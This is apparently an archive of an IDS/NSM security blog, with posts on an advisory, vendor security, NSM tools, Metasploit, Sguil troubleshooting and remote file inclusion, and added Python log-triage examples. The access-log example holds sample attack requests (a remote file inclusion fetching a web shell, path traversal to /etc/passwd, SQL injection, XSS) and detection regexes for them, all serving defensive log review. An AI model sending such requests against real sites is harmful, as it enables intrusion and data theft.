Showing posts with label IDS/NSM. Show all posts

Wednesday, December 19, 2012

Kiwi Syslog Web Access 1.4.4 SQL Injection & Blind SQL Injection

Product: Kiwi Syslog Web Access
Version: 1.4.4
Vendor: http://www.kiwisyslog.com/kiwi-syslog-server-overview/
Vulnerability type: SQL Injection and Blind SQL Injection
Risk level: High
Vendor notification: 2012-12-18
Tested on: Windows 2003
Author: Mohd Izhar Ali

Kiwi Syslog Web Access version 1.4.4 suffers from remote SQL injection and blind SQL injection vulnerabilities.

The full advisory can be downloaded here:
http://packetstormsecurity.org/files/118945/Kiwi-Syslog-Web-Access-1.4.4-SQL-Injection.html

Tuesday, December 06, 2011

Vendor Security

I’d like to share our experiences with vendor security since I’m sure it’s something that impacts all of us. Like every company, Rapid7 relies on a number of technology vendors for a huge range of products and services to run the business. I’m sure no one will be surprised to hear that as a security company we have a policy specifying the security requirements that our vendors need to meet before we’ll do business with them. Our view is that their security directly impacts any of our internal or customer data that their systems hold, so we take it as seriously as our own infrastructure security. Most or all of you probably have the same approach, but one unique thing that we have at our disposal is a number of highly skilled security experts on staff which allows us to have a mandatory application security assessment as part of our policy.

The results of this policy over the last few years have been eye-opening.  The number of prospective vendors that pass our security bar is disappointingly low, across every category we used (marketing tools, sales tools, support tools, file transfer tools, IT infrastructure, etc). The most recent failure sparked this blog post, but it was the norm rather than the exception. More often than not they fail basic tests with numerous readily apparent and easily exploitable issues. If the vendor has a great product or service that we think is significantly better than the alternatives we evaluated, we’ll delay our deployment while we engage with them to address the issues we found, getting commitments to fix in a defined timeline. The results there have been equally dismal, with most of them missing their commitments and forcing us to end up going with an alternate months later. It’s clear that our security bar is far higher than their bar, but also that in many cases they don’t have either the desire or skills to significantly improve their security.

All of this ends up slowing our deployment of the various third party solutions, which is an acceptable tradeoff in our view. But what do we do when none of the vendors in the space pass the security bar? And more broadly, what can we do as a security community to raise awareness of the state of vendor security and create impetus for change?  Our individual efforts to push the vendors we’ve engaged with generally haven’t been enough to move the ball. If you have any suggestions on how we can tackle this as a community, please post them below.

In the meantime, I thought I’d share our own approach in case it’s useful to any of you. The overall approach we use is a coordinated process between procurement, legal, and IT security. Having a coordinated process between the business discussion and technical due diligence allows for not just improved decision making, but also more informed negotiation.

  1. First, in addition to screening new vendors, if you haven’t already been doing this, start by pulling together a list of all your existing vendors (particularly SaaS vendors that have an exposed security surface). This will be eye-opening the first time you do it, since lots of groups will have been using tools without any IT involvement.
    • One useful tactic we use to find out what’s in use and catch new ad-hoc “deployments” that bypass your vetting process is a periodic review of corporate credit card statements, flagging expenses associated with known vendors & SaaS providers.
  2. Use a security questionnaire to understand their security policies, processes, and sophistication.
  3. Demand to see the results of their latest security audit, showing what was tested, the findings, and the remediation they’ve done since that time. (We do an audit ourselves because we can). Negotiate for rights to this on a periodic basis.
  4. Pay close attention to audit logging functionality. Does the SaaS application track and report on login/logout, user actions within the application, and does it track source IP address? At the very least, you will want to conduct periodic reviews of the account logs to check for anomalies.
  5. Scrutinize the identity management capabilities and set a policy for how they are used. Access management, particularly account management, is one of the weakest areas of SaaS security today. Multiple users are often tempted to share accounts because account limits are common to SaaS: this practice needs to be discouraged. Organizational password strength and password rotation policies are usually difficult to enforce when it comes to SaaS. Account provisioning and de-provisioning usually happens outside the IT group, and sometimes there are multiple users on a SaaS application with the ability to create accounts but no single user with clear ownership of, and responsibility for, the application. This creates a substantial risk that accounts will not be revoked in a timely fashion upon a change in employment status. Some approaches that can mitigate the issue:
    • Ensure that IT is solely responsible for account management in all SaaS applications.
    • Conduct periodic reviews of active SaaS accounts across all applications, matching to current employee rosters.
    • Work with your SaaS provider to enact IP-level restrictions to all logins, so that employees are required to be either physically present in the office or connected to the VPN to log in to the SaaS application. This will require the VPN to operate in “full tunnel” mode, where all traffic (including internet traffic) is driven over the VPN to egress from the corporate network.
  6. Most SaaS applications allow you to grant different levels of permissions to different users. As much as possible, place reasonable limits on user access levels in SaaS applications. Restrict manager privileges to as few accounts as possible.

As companies increasingly rely on SaaS solutions to do everyday business, and security moves even further outside of your control, it becomes more and more important to proactively ensure the security and integrity of the solution you rely on. Employing a number of these suggestions, when considering your SaaS solutions, will help put you on the road to a higher level of security serving both your internal stakeholders and customers well.

Article from Rapid7 Blog:

Wednesday, October 12, 2011

Backdoor Trojan alleged to have been created and used by German law enforcement authorities

Under German law, the police are allowed to use spyware to snoop on suspected criminals – but only under strict guidelines. The spyware must not alter any code on the suspect’s computer and safeguards must be put in place to prevent the Trojan being subverted to include additional functionality.

The Chaos Computer Club (CCC) has announced the discovery of a backdoor Trojan horse that is capable of spying on online activity such as recording Skype conversations and monitoring online behaviour. The CCC implies that the malware was created for, and is being used by, German law enforcement authorities such as the BKA and LKA.

Sophos’s analysis of the malware confirms that it has the following functionality:
* The Trojan can eavesdrop on several communication applications - including Skype, MSN Messenger and Yahoo Messenger
* The Trojan can log keystrokes in Firefox, Opera, Internet Explorer and SeaMonkey
* The Trojan can take JPEG screenshots of what appears on users' screens and record Skype audio calls
* The Trojan attempts to communicate with a remote website

“While it’s not possible to *prove* who authored the malware, it’s beginning to look more and more likely that the German authorities were involved,” said Graham Cluley, senior technology consultant at Sophos. “The malware targets Windows computers and to become infected, you typically might receive an email containing an attached file, or a link to the web which would then infect the computer. SophosLabs detects all malware that we know about – regardless of who the author might be. So whether this malware is state-sponsored or not, we’ve added protection against this attack.”

Source: SecurityPark

Monday, October 03, 2011

HITB SecConf2011 Malaysia (October 10 to 13)

Run as a not for profit, community backed effort, the Hack in The Box Security Conference (HITBSecConf) series has become the ‘must attend’ event in the calendars of security professionals from around the world.
Having started as a small gathering of Malaysian security specialists in 2002, the event has since expanded out of its home base in Kuala Lumpur to Dubai and in 2010, The Netherlands. Our events are put together by a team of dedicated crew and volunteers and through the continued support of our sponsors, HITBSecConf has grown into the largest network security conference in the Asia Pacific and Middle East region!
The main aim of our conferences has always been to enable the dissemination, discussion and sharing of deep knowledge network security information. Our main focus is on new and groundbreaking attack and defense methods that have not been seen or discussed in public before. HITBSecConf events bring together a unique mix of security professionals, researchers, law enforcement and members of the hacker underground under one roof and our flagship event in Malaysia sees over 1000 attendees.
The event runs over a 4 day period with 2 days of intensive hands on training sessions followed by a two-day conference with either three or four concurrent tracks inclusive of a hands on lab session (HITB Labs) and 15 minute lightning talks (HITB SIGINT). The HITB Labs caters for only 50-100 attendees and these sessions are intensive, hands-on presentations that require audience interaction. The HITB SIGINT (Signal Intelligence/Interrupt) sessions on the other hand, are designed to provide a quick 15 minute overview for material and research that's 'up and coming' - stuff that isn't quite ready for the mainstream tracks of the conference but deserve a mention nonetheless.
In addition to the conference tracks, our events are also further enhanced with an open-to-public technology and exhibition area, lock picking villages, hackerspace villages and of course, our ever popular Capture The Flag competition (CTF) !

For more information about the agenda and speakers, please see the link below:
http://conference.hitb.org/hitbsecconf2011kul/

Friday, May 14, 2010

Xplico 0.5.7: VoIP tapping and phone numbers

The goal of Xplico is to extract the application data contained in an Internet traffic capture. For example, from a pcap file Xplico extracts each email (POP, IMAP and SMTP protocols), all HTTP contents, each VoIP call (SIP), and so on.

This release improves the SIP and RTP dissectors and adds an RTCP dissector. With the RTCP dissector Xplico is able to obtain the phone numbers of the caller and the called party (only if they are present in the RTCP packets, obviously). The DEFT 5.1 Live distribution contains this version.
You can download the source code and the Ubuntu 10.04 package here.

More about Xplico:
http://sourceforge.net/projects/xplico/files/
http://www.xplico.org/

Suricata – Open Source Next Generation Intrusion Detection and Prevention Engine

The Suricata Engine is an Open Source Next Generation Intrusion Detection and Prevention Engine. This engine is not intended to just replace or emulate the existing tools in the industry, but will bring new ideas and technologies to the field.

Basically, it is a multi-threaded intrusion detection/prevention engine available from the Open Information Security Foundation (OISF). OISF is part of and funded by the Department of Homeland Security's Directorate for Science and Technology HOST program (Homeland Open Security Technology), by the Navy's Space and Naval Warfare Systems Command (SPAWAR), and through the very generous support of the members of the OISF Consortium. More information about the Consortium is available, as well as a list of the current Consortium members. The Suricata Engine and the HTP Library are available under the GPLv2.

The HTP Library is an HTTP normalizer and parser written by Ivan Ristic of ModSecurity fame for the OISF. It integrates with Suricata and provides very advanced processing of HTTP streams. The HTP library is required by the engine, but may also be used independently in a range of applications and tools.
You can download Suricata v0.9 here:
http://www.openinfosecfoundation.org/download/suricata-0.9.0.tar.gz

For more details, please refer here:
http://www.openinfosecfoundation.org/

Friday, April 16, 2010

CRITICAL LOG REVIEW CHECKLIST FOR SECURITY INCIDENTS

This cheat sheet presents a checklist for reviewing critical logs when responding to a security incident. It can also be used for routine log review. To download it, click here:
http://www.securitywarriorconsulting.com/security-incident-log-review-checklist.pdf


General Approach
  • Identify which log sources and automated tools you can use during the analysis.
  • Copy log records to a single location where you will be able to review them.
  • Minimize “noise” by removing routine, repetitive log entries from view after confirming that they are benign.
  • Determine whether you can rely on logs’ time stamps; consider time zone differences.
  • Focus on recent changes, failures, errors, status changes, access and administration events, and other events unusual for your environment.
  • Go backwards in time from now to reconstruct actions after and before the incident.
  • Correlate activities across different logs to get a comprehensive picture.
  • Develop theories about what occurred; explore logs to confirm or disprove them.

Typical Log Locations
  • Linux OS and core applications: /var/log
  • Windows OS and core applications: Windows Event Log (Security, System, Application)
  • Network devices: usually logged via Syslog; some use proprietary locations and formats.
What to Look for on Linux
  • Successful user login- “Accepted password”, “Accepted publickey”, "session opened”
  • Failed user login- “authentication failure”, “failed password”
  • User log-off- “session closed”
  • User account change or deletion- “password changed”, “new user”, “delete user”
  • Sudo actions- “sudo: … COMMAND=…”, “FAILED su”
  • Service failure- “failed” or “failure”
What to Look for on Windows
Event IDs are listed below for Windows 2000/XP. For Vista/7 Security event IDs, add 4096 to the event ID (528 becomes 4624, 624 becomes 4720). Treat that as a first approximation rather than an exact map: Vista/7 folded the separate logon-failure IDs 529-537 and 539 into the single ID 4625, and both logon-success IDs 528 and 540 into 4624. Most of the events below are in the Security log; many are only logged on the domain controller.
  • User logon/logoff events- Successful logon 528, 540; failed logon 529-537, 539; logoff 538, 551, etc.
  • User account changes- Created 624; enabled 626; changed 642; disabled 629; deleted 630
  • Password changes- Changed by the user (own password): 627; reset by an administrator or another account: 628
  • Service started or stopped- 7035, 7036, etc. (Service Control Manager events in the System log, not the Security log; the +4096 rule does not apply to them)
  • Object access denied (if object auditing is enabled)- 560, 567, etc.
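To show how the Linux search strings and the Windows event ID rule above are applied in practice, here is an added example (not part of the original cheat sheet): a Python script that tags a constructed auth.log excerpt with the checklist categories, pivots failed logins by source address, and converts Windows 2000/XP Security event IDs to their Vista/7 equivalents so events from both generations can be counted together. The hostnames, addresses and the Windows event feed are made up for the illustration. The exception table encodes the IDs that Vista merged rather than simply renumbered (528 and 540 both became 4624; 529-537 and 539 became 4625), which is the caveat the plain +4096 rule does not cover.

```python
import re
from collections import Counter

# --- Linux: constructed auth.log excerpt (sample data, not taken from the page) -------------------
SAMPLE_AUTH_LOG = """\
Apr 16 09:12:01 web01 sshd[2231]: Accepted publickey for deploy from 10.0.0.5 port 51022 ssh2
Apr 16 09:12:01 web01 sshd[2231]: pam_unix(sshd:session): session opened for user deploy by (uid=0)
Apr 16 09:15:44 web01 sshd[2290]: Failed password for root from 203.0.113.7 port 40122 ssh2
Apr 16 09:15:46 web01 sshd[2290]: Failed password for root from 203.0.113.7 port 40122 ssh2
Apr 16 09:15:49 web01 sshd[2290]: Failed password for invalid user admin from 203.0.113.7 port 40125 ssh2
Apr 16 09:16:00 web01 sshd[2291]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=203.0.113.7  user=root
Apr 16 09:20:03 web01 sudo:   deploy : TTY=pts/0 ; PWD=/home/deploy ; USER=root ; COMMAND=/usr/sbin/useradd backup2
Apr 16 09:20:03 web01 useradd[2310]: new user: name=backup2, UID=1002, GID=1002, home=/home/backup2, shell=/bin/bash
Apr 16 09:21:10 web01 su[2315]: FAILED su for root by www-data
Apr 16 09:25:00 web01 sshd[2231]: pam_unix(sshd:session): session closed for user deploy
"""

# The checklist's Linux search strings as regexes. Order matters: the first match wins, and the
# generic "failed/failure" service check comes last so it does not swallow the login failures.
LINUX_PATTERNS = [
    ("login_ok",        re.compile(r"Accepted (?:password|publickey)|session opened")),
    ("login_failed",    re.compile(r"authentication failure|[Ff]ailed password")),
    ("logoff",          re.compile(r"session closed")),
    ("account_change",  re.compile(r"password changed|new user|delete user")),
    ("sudo",            re.compile(r"sudo: .*COMMAND=|FAILED su")),
    ("service_failure", re.compile(r"\bfail(?:ed|ure)\b", re.IGNORECASE)),
]
# sshd writes "from <ip>", pam_unix writes "rhost=<ip>"
SOURCE_RE = re.compile(r"(?:from |rhost=)(\d{1,3}(?:\.\d{1,3}){3})")


def classify_linux(lines):
    """Tag each line with the first checklist category that matches (None if nothing matches)."""
    return [(next((name for name, rx in LINUX_PATTERNS if rx.search(line)), None), line)
            for line in lines]


def summarize_linux(lines):
    """Counts per category, as a plain dict, so a reviewer sees at a glance what the excerpt holds."""
    return dict(Counter(cat for cat, _ in classify_linux(lines) if cat))


def failed_logins_by_source(lines):
    """Failed logins grouped by remote address: the first thing to pivot on for brute-force attempts."""
    counts = Counter()
    for cat, line in classify_linux(lines):
        if cat == "login_failed":
            m = SOURCE_RE.search(line)
            counts[m.group(1) if m else "unknown"] += 1
    return dict(counts)


# --- Windows: 2000/XP Security IDs from the checklist vs. their Vista/7 successors ----------------
# The +4096 rule holds for most IDs (528->4624, 624->4720, 627->4723, ...). Vista folded the
# separate failure reasons 529-537/539 into 4625 and the network logon success 540 into 4624.
VISTA_MERGES = {540: 4624, **{i: 4625 for i in (529, 530, 531, 532, 533, 534, 535, 536, 537, 539)}}
SYSTEM_LOG_IDS = {7035, 7036}   # Service Control Manager, System log: not subject to the +4096 rule


def modern_event_id(legacy_id):
    """Map a Windows 2000/XP event ID to the ID a Vista/7 host would log for the same thing."""
    if legacy_id in SYSTEM_LOG_IDS:
        return legacy_id
    return VISTA_MERGES.get(legacy_id, legacy_id + 4096)


# Constructed feed of (event_id, os_generation) from a mixed XP / Windows 7 estate (sample data).
SAMPLE_WINDOWS_EVENTS = [(529, "xp"), (535, "xp"), (4625, "win7"), (528, "xp"), (540, "xp"),
                         (4624, "win7"), (624, "xp"), (628, "xp"), (7036, "xp"), (7036, "win7")]


def normalize_windows_events(events):
    """Count events on the Vista/7 ID scheme so hosts of both generations are reviewed together."""
    counts = Counter()
    for event_id, generation in events:
        counts[modern_event_id(event_id) if generation == "xp" else event_id] += 1
    return dict(counts)


if __name__ == "__main__":
    lines = SAMPLE_AUTH_LOG.splitlines()
    print("linux categories:", summarize_linux(lines))
    print("failed logins by source:", failed_logins_by_source(lines))
    print("windows events (Vista/7 IDs):", normalize_windows_events(SAMPLE_WINDOWS_EVENTS))
```

The pattern order is deliberate: a line such as "Failed password for root" contains the word "failed" and would land in the service-failure bucket if that catch-all were tested first. The same first-match discipline applies when you turn these strings into grep or SIEM rules.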
What to Look for on Network Devices
Look at both inbound and outbound activities. Examples below show log excerpts from Cisco ASA logs; other devices have similar functionality.
  • Traffic allowed on firewall- “Built … connection”, “access-list … permitted”
  • Traffic blocked on firewall- “access-list … denied”, “deny inbound”; “Deny … by”
  • Bytes transferred (large files?)- “Teardown TCP connection … duration … bytes …”
  • Bandwidth and protocol usage- “limit … exceeded”, “CPU utilization”
  • Detected attack activity- “attack from”
  • User account changes- “user added”, “user deleted”, “User priv level changed”
  • Administrator access- “AAA user …”, “User … locked out”, “login failed”
What to Look for on Web Servers
  • Excessive access attempts to non-existent files
  • Code (SQL, HTML) seen as part of the URL
  • Access to extensions you have not implemented
  • Web service stopped/started/failed messages
  • Access to “risky” pages that accept user input
  • Look at logs on all servers in the load balancer pool
  • Status code 200 on files that are not yours (a file you never deployed being served successfully)
  • Failed user authentication- Status code 401, 403
  • Invalid request- Status code 400
  • Internal server error- Status code 500

How to choose your Information Security Training

Article taken from: http://www.offensive-security.com/blog/offsec/questions-information-security-training-provider/

In the past couple of years, the economy has struck hard on organizations seeking to educate their employees. Training budgets have been cut down, and choosing the right course that will give you real Return on Investment is not an easy job. This is especially true in the offensive InfoSec arena, where training standards and qualifications are weakly defined. So how can you make sure you're getting your money's worth?
Welcome to our “10 questions you should be asking your InfoSec Training Provider“.

1. What are the objectives of the training ?

What will the training do for you? Anyone promising you that you will be a "hardcore penetration tester" or a "security expert" after their 5 day class has never run a pentest, or otherwise has no clue what they are talking about. Learning *any* profession in 5 days is unrealistic, let alone one as complex as IT Security, or penetration testing. This is one of the first questions I ask before attending a training... it allows me to set my goals for the course and gives me a baseline for my expectations.

2. What topics does the course cover ?

Always read the syllabus of the course you want to attend, before you attend it.  Try finding other people who have taken the class, (if possible) and get their opinion. Try to see if the syllabus follows a reasonable methodology, or if it’s just a collection of topics. If you see a list of 1500 tools on the syllabus – expect to spend around 0.6 minutes per tool. 

3. Who is your trainer ?

Are they well known in their field ? Do they have training experience ? Are they involved in the security community ? Do they practice what they preach? Although these are 4 separate questions, they all relate to one thing – the ability of the trainer to provide the goods you paid so dearly for. Finding a GOOD InfoSec trainer is NOT easy. Most computer genii are usually lacking in their social skills – something a good trainer must have.

4. What previous reviews does the class have ?

Running a few internet searches for the name of your class, or the name of the trainer is a must. Find out what people have to say about their experiences – during and after the class. Although you can’t believe *everything* on the internet, taking an average of all the reviews will usually give you a solid idea of what you are getting into.

5. What is the ratio of students to trainers ?

How many students will there be in the class ? Some training providers cram more than 30 students in one class – often with a single instructor. During a 5 day period, a trainer can’t give personal attention to 30 people, no matter what. In general, smaller classes mean a more intimate environment, more attention from the trainer, and a more productive and engaging experience.

6. What is the ratio between theory and hands-on exercises ?

Remember the famous saying “In theory, there is no difference between theory and practice – But in practice, there is”. If you don’t exercise what you learn, you are less likely to retain or understand it as nothing replaces practical experience. Ask for a rough ratio estimate for “theory VS exercise” for your class – anything above 40% class-time spent on exercises is a good sign. Of course, this greatly depends on the quality of the exercises too.

7. How often is the course updated ? Is the material relevant to modern day situations ?

Learning methods and techniques on antiquated systems will bring you little benefit in the real world. Hacking a Windows 2000 SP4 machine with RPC DCOM doesn't cut it any more. On the other hand, don't expect to learn "Bypassing Windows 7 Stack Protection" in an introductory buffer overflows course. You need to gauge the balance between these two elements carefully.

8. What are the pre-requisites for the class ?

How should you prepare yourself for the class? Do you need to refresh your knowledge on certain topics? Nothing is more frustrating than coming to a class, and then lagging behind because you are not up to par with the class requirements. Not good for your learning experience, and not good for your self esteem – on the other hand “no pre-requisites required” might indicate lack of depth. If the pre-requisites were defined well by the training provider, it’s definitely a good resource to use to evaluate the relevancy of the course to you.

9. Is there a certification involved? What is its value?

The “value” of a certification can be measured in the real world using two main indicators:
  • The “market value” of the certification – how popular is this certification in the workforce ? Is the certificate recognized and appreciated by the industry ? And of course, will it help you get a (better) job ?
  • The “practical value” of the certification – or as Eddie Murphy would say “WHAT HAVE YOU DONE FOR ME LATELY?”.  What real world skills does the certificate prove? If it proves you can memorize 100 questions, you might not be up to the job when confronted with a real world scenario.

10. What post training benefits are provided?

What ongoing benefits will you get from the training provider, if any? Is there a continuation path for the training? Will the trainers be available for future questions or issues that may arise? Is there a student community you can join, to discuss the course with other students? Or in other words, what kind of "post customer service" can you expect?
These 10 questions should cover all the important elements you should verify before committing your valuable time and limited training budget to any service provider. The average person only gets a limited number of training opportunities per year, therefore you should always maximize the return you receive.

Monday, September 14, 2009

NSMnow – 1.5.0

The NSMnow 1.5 series brings the initial complete feature set for Fedora, RHEL and CentOS systems. This is excellent news for those who have wanted to have, use or test an NSM configuration for themselves but were daunted by the process of building one from scratch.

With this being the initial release of support for Fedora, RHEL and CentOS, there are bound to be some teething problems. As long as you submit bug reports, the developers will fix them and NSMnow will continue to get even better, if that's possible.

Download: http://www.securixlive.com/nsmnow/download.php

Monday, July 27, 2009

Fuzzgrind

Fuzzgrind is a fully automatic fuzzing tool, generating test files with the purpose of discovering new execution paths likely to trigger bugs and potentially vulnerabilities.

It is based on the concept of symbolic execution. Thus, the tool starts from a file considered valid by the software under test, and analyses the execution path to extract any constraints tied to branch instructions followed by this software. By resolving constraints one by one, Fuzzgrind will alter the valid file to explore possible new branches of the software under test, in order to discover new vulnerabilities.

Fuzzgrind is licensed under the terms of the GNU GPL. Anybody is welcome to contribute!

Tuesday, March 24, 2009

Metasploit 3.2

The Metasploit Framework is a development platform for creating security tools and exploits. It's used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide.

Compared to Metasploit 3.0, getting attack code onto a target machine is easier in Metasploit 3.2 thanks to improvements to the raw packet tools. A new library called PacketFu is expected by Moore to provide packet injection for both wired and wireless endpoints. The release also provides improved support for exploiting multi-core CPU machines, which had been more difficult to attack with previous versions of Metasploit.

Metasploit is also able to take exploit code and weaponize it in an .EXE (executable file) that can be deployed by an attacker. Moore said the EXE template used to create EXE payloads has been improved in Metasploit 3.2 in order to defeat antivirus vendors' signature detection.

If you have never tried Metasploit, you can download it here.

Saturday, February 28, 2009

SecurixNSM 1.3

Securix-NSM is the successor of Knoppix-NSM. It's an extension of our NSMnow technology, integrated with the universal Debian foundation and a range of other tools to work from. Like its predecessor, Securix-NSM is dedicated to providing a framework for individuals who want to learn about Network Security Monitoring (NSM) or who want to quickly and reliably deploy an NSM capability in their network.

Securix-NSM is now based on Debian Live, which means that you can test all the tools in a live Debian session running on the CD without the need for a HardDisk Drive (HDD) installation.

You can download the ISO here.

Wednesday, January 21, 2009

NSMnow 1.3

NSMnow is all about building a Network Security Monitoring (NSM) framework. It's very fast and easy, without the messy patching and configuration of each tool that is normally needed to get the system up and running. It builds a Sguil system with the minimum amount of fuss so you can actually focus on using Sguil instead of building it.
More details, see this site: http://www.securixlive.com/
If you want to download: here

Monday, October 27, 2008

Hex 2.0 Release!!

HeX is a project aimed at the NSM (Network Security Monitoring) community for use by network security analysts. The developers believe that simplicity and analysis workflow logic must be enhanced and emphasized throughout the process of designing this liveCD. Not only have they carefully chosen all the necessary applications and tools to be included in the liveCD, they have also tested them to make sure everything runs as smoothly as possible. To summarize the objective of HeX: they are trying to develop the first and foremost Network Security Monitoring & Network Based Forensics liveCD!

You can find information about Hex 2.0 here:
http://www.rawpacket.org/projects/hex/hex-livecd/version-20-release

Saturday, April 21, 2007

Port 443

SANS reports that there is a significant increase in port 443 scans. They ask that if you see attacks against HTTPS servers, please let them know. If you see something like that, I think you can send your web server logs/IDS logs/firewall logs to them to confirm whether there is an attack or not.
http://isc.sans.org/diary.html?storyid=2673

Last year, I got the same problem at my client site. One of my team members reported to my Security Consultant that she had detected a series of Attack Response alerts from our Snort IDS. This alert involved port 443 (https). So we analysed that alert and checked the source IP, because the 443 service came from that source IP. After analysing that alert, we confirmed that there was no SSL/https related service available on the source IP. It looked like a normal website. There was no https service available on that IP. If there were an https service, it should be encrypted. We wanted to analyse the details and make a decision about that alert, but we didn't have more resources. Maybe the attacker had compromised that IP earlier, installed a backdoor/trojan/malware there and used it to communicate through port 443? Or maybe a misconfiguration?? See this link:
http://blog.hazrulnz.net/121/finally-2.html

From my experience, this question is not easy to answer if you only have Snort alerts. That makes the question too difficult to answer. Looking at the alerts alone, there is nothing else we can do. You cannot give the right answer to this question.

That's why I like to use Sguil. Sguil is an open source suite for performing NSM (Network Security Monitoring). NSM equips security staff to deal with the inevitable consequences of too few resources and too many responsibilities. NSM collects the data needed to generate better assessment, detection, and response processes, resulting in decreased impact from unauthorized activities.

Sunday, April 01, 2007

Sguil Problem

Today, I had a problem with my Sguil machine. When I wanted to run the Sguil script, I got this error: "Table `event` is marked as crashed and should be repaired".

I checked the error message with dmesg to find out the cause of the problem:


After that, I tried to restart the sguild script, but I got the same error. At the same time, I remembered a TaoSecurity post about a MySQL problem. I searched the TaoSecurity blog and found this link:
http://taosecurity.blogspot.com/2007/03/recovering-from-corrupted-mysql.html

I ran the mysqlcheck command like this:
izhar/root #mysqlcheck -r sguildb -p
Enter password


After running mysqlcheck, I tried to start the sguild script again, but it still did not work. I rebooted my FreeBSD 6.1 machine and went into maintenance mode. I ran the fsck command to check file system consistency and interactively repair the file system:
#fsck


After running fsck, I rebooted my Sguil machine and tried to run Sguil again. Everything worked without any errors, so I could use my Sguil machine again.

Conclusion: shut down your Sguil machine properly. Hehehe, yesterday I forgot to shut it down and immediately closed my VMware Sguil without shutting it down.

Sunday, March 18, 2007

Analysis of Remote File Inclusion Attempts

This is an analysis from the SANS diary about a remote file inclusion attempt:
http://isc.sans.org/diary.html?storyid=2462

Remote file inclusion is one of the newest and most popular techniques used by an attacker to attack a website from a remote computer. If your server runs a web application that allows an attacker to perform remote file inclusion, it is very easy for the attacker to take over your server remotely.

PHP applications are a frequent source of remote file inclusion flaws. The reasons for this PHP issue are:
  • Insufficient validation of user input prior to dynamic file system calls, such as require, include or fopen()
  • allow_url_fopen and PHP stream wrappers allow this behaviour by default, which is unnecessary for most applications (since PHP 5.2 the include/require case is governed separately by allow_url_include, which is off by default; allow_url_fopen still affects fopen() and friends)
  • Poor permissions and planning by many hosters, allowing excessive default privileges and wide-ranging access to what should be off-limits areas.
If you want to find more information about PHP remote code execution, you can refer to this:
http://www.owasp.org/index.php/PHP_Top_5#P1:_Remote_Code_Execution
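The web-server items in the log review checklist earlier on this page ("Code (SQL, HTML) seen as part of the URL", "Excessive access attempts to non-existent files", "Access to extensions you have not implemented", a 200 on a file that is not yours, and the 400/401/403/500 statuses) and the symptom of the remote file inclusion attempt discussed here (a parameter whose value is itself a URL or a PHP stream wrapper) can all be checked in one pass over an access log. The following is an added example, not code from this blog or from the SANS diary: a small Python triage script run over a constructed Apache combined-format excerpt. The site inventory in DEPLOYED_PATHS and IMPLEMENTED_EXTENSIONS, the sample addresses and the threshold of three 404s per source are assumptions made for the illustration.

```python
import os
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample in Apache/nginx combined log format (sample data, not from the page).
SAMPLE_ACCESS_LOG = """\
203.0.113.9 - - [18/Mar/2007:10:02:11 +0800] "GET /index.php?page=http://198.51.100.23/c99.txt? HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
203.0.113.9 - - [18/Mar/2007:10:02:12 +0800] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1204 "-" "Mozilla/4.0"
203.0.113.9 - - [18/Mar/2007:10:02:13 +0800] "GET /admin/phpmyadmin/ HTTP/1.1" 404 312 "-" "Mozilla/4.0"
203.0.113.9 - - [18/Mar/2007:10:02:13 +0800] "GET /pma/ HTTP/1.1" 404 312 "-" "Mozilla/4.0"
203.0.113.9 - - [18/Mar/2007:10:02:14 +0800] "GET /mysql/ HTTP/1.1" 404 312 "-" "Mozilla/4.0"
203.0.113.9 - - [18/Mar/2007:10:02:14 +0800] "GET /default.asp HTTP/1.1" 404 312 "-" "Mozilla/4.0"
203.0.113.9 - - [18/Mar/2007:10:03:40 +0800] "GET /uploads/shell.php HTTP/1.1" 200 88 "-" "Mozilla/4.0"
198.51.100.44 - - [18/Mar/2007:10:05:02 +0800] "GET /login.php?user=admin%27%20OR%201%3D1-- HTTP/1.1" 500 0 "-" "curl/7.15"
198.51.100.44 - - [18/Mar/2007:10:05:09 +0800] "POST /login.php HTTP/1.1" 401 220 "-" "curl/7.15"
198.51.100.44 - - [18/Mar/2007:10:05:30 +0800] "GET /search.php?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 950 "-" "curl/7.15"
10.0.0.8 - - [18/Mar/2007:10:06:00 +0800] "GET /products.php?id=42 HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Assumed inventory of what the site actually deploys. A 200 for anything else is the
# "files that are not yours" case from the checklist (a dropped web shell, for instance).
DEPLOYED_PATHS = {"/", "/index.php", "/login.php", "/products.php", "/search.php"}
IMPLEMENTED_EXTENSIONS = {"", ".php", ".html", ".css", ".js", ".png", ".jpg"}

# Checks run against the *decoded* parameter values, i.e. what the PHP application sees.
QUERY_CHECKS = [
    # remote file inclusion: a parameter value that is itself a URL or a PHP stream wrapper
    ("rfi",         re.compile(r"^(?:https?|ftp|php|data|expect)://", re.IGNORECASE)),
    ("traversal",   re.compile(r"(?:^|/)\.\.(?:/|$)")),
    ("sqli",        re.compile(r"'\s*(?:or|and|union)\b|union\s+select|--\s*$|/\*", re.IGNORECASE)),
    ("html_in_url", re.compile(r"<\s*(?:script|iframe|img)\b", re.IGNORECASE)),
]
STATUS_CHECKS = {"401": "auth_failure", "403": "auth_failure", "400": "bad_request", "500": "server_error"}
NOT_FOUND_THRESHOLD = 3   # assumed: this many 404s from one address counts as probing


def parse_entry(line):
    """Split one combined-format line into fields; None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = unquote(parts.path)
    entry["params"] = parse_qs(parts.query, keep_blank_values=True)   # values are percent-decoded
    return entry


def indicators_for(entry):
    """Checklist indicators that apply to a single request, in a fixed order."""
    hits = []
    values = [v for vals in entry["params"].values() for v in vals]
    for name, rx in QUERY_CHECKS:
        if any(rx.search(v) for v in values):
            hits.append(name)
    if os.path.splitext(entry["path"])[1].lower() not in IMPLEMENTED_EXTENSIONS:
        hits.append("unexpected_extension")
    if entry["status"] == "200" and entry["path"] not in DEPLOYED_PATHS:
        hits.append("undeployed_200")
    if entry["status"] in STATUS_CHECKS:
        hits.append(STATUS_CHECKS[entry["status"]])
    return hits


def analyze_access_log(text):
    """Return (findings, scanners): per-request indicators and sources with too many 404s."""
    findings, not_found = [], Counter()
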